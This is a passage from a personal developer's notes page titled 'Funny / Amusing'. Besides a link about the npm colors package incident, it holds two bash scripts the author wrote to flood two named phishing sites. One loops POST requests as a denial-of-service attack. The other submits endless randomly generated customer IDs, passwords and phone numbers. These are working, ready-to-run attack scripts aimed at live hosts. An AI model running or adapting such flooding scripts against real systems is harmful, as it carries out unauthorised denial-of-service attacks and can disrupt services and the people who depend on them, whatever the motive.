Funny / Amusing

  1. What NPM Should Do Today To Stop A New Colors Attack Tomorrow - Marak added an americalFlag in his color npm package in this PR - Read the funny comments
  2. Today I got two phishing URL messages, one spoofing SBI and other HDFC.

I wrote a script to do attack (DOS). I hope they’ll have hard time finding out the real OTP from layman users.

#!/bin/bash

URL="https://sazi-y5a.web.app/d2"
DATA="MOtp1=100000"

for ((i = 1; i <= 1000000000000000; i++)); do
  echo "Sending request $i"
  curl -X POST -d "$DATA" "$URL"
done

#!/bin/bash

URL="https://hanvi-6yt.web.app/c1"

for ((i = 1; i <= 99999999999999; i++)); do
  CUSTOMER_ID=$(shuf -i 100000-999999 -n 1)
  PASSWORD=$(openssl rand -base64 12)
  MOBILE_NUMBER=$(shuf -i 6000000000-6999999999 -n 1)

  DATA="customer_id=$CUSTOMER_ID&password=$PASSWORD&mobile_number=$MOBILE_NUMBER"

  curl -X POST -d "$DATA" "$URL"
done


This is a sapling 🌱 in my digital garden 🏡.

Notes mentioning this note

There are no notes linking to this note.


Here are all the notes in this garden, along with their links, visualized as a graph.

Finance/Banking IdeasOrendaa wishlistTechnical Library IdeasAdaptor PatternDesign PatternsSoftware Design PrinciplesCaaS (Containers As A Service)DevOps NotesDocker Container RegistryDockerFaaS (Functions As A Service) - Serverless...IaaS (Infrastructure As A Service)KubernetesTerraformUsefulunixcommandsConcurrency vs ParallelismDistributed Service with GoDistributed System Learning NotesetcdMetrics, tracing, and loggingProtobufGoLang NotesGoLang ResourcesLearning from JPMakefileLinux NotesAanand Prasad - Creator of Fig/Docker composeMetaprogramming RubyRackDatabase SecuritySecuritySQL InjectionMVPMarket/Startup AnalysisBlue OceanHow to talk to your potential customers?How to work togetherBest way to Launch your startup (Again and Again)Business Process ModelJavascript NotesJavascript ToolsReactJSTypeScript NotesWeb APIs (Browser)Bon appétit!A note about catsTigersBackend DevelopmentBlog WishlistNotable websitesCI/CDHusky - Git commit hookConsistency is keyRedis NotesPostgresql NotesFunny / AmusingGit CLIGraphQL NotesJavascriptJSON Web Token (JWT)Move your body every dayUseful ToolsNot BehindLeslie LamportOpen AIPrivate-Public Key AuthProgramming LanguagesProject EulerRails credentialsRails Devise IntegrationRails Docker Issues and FixesRails-DockerRails NotesReproducible BuildsSemantic VersioningSoftware EngineeringSuccessChandan's TODOCraftman/EngineerYour first seed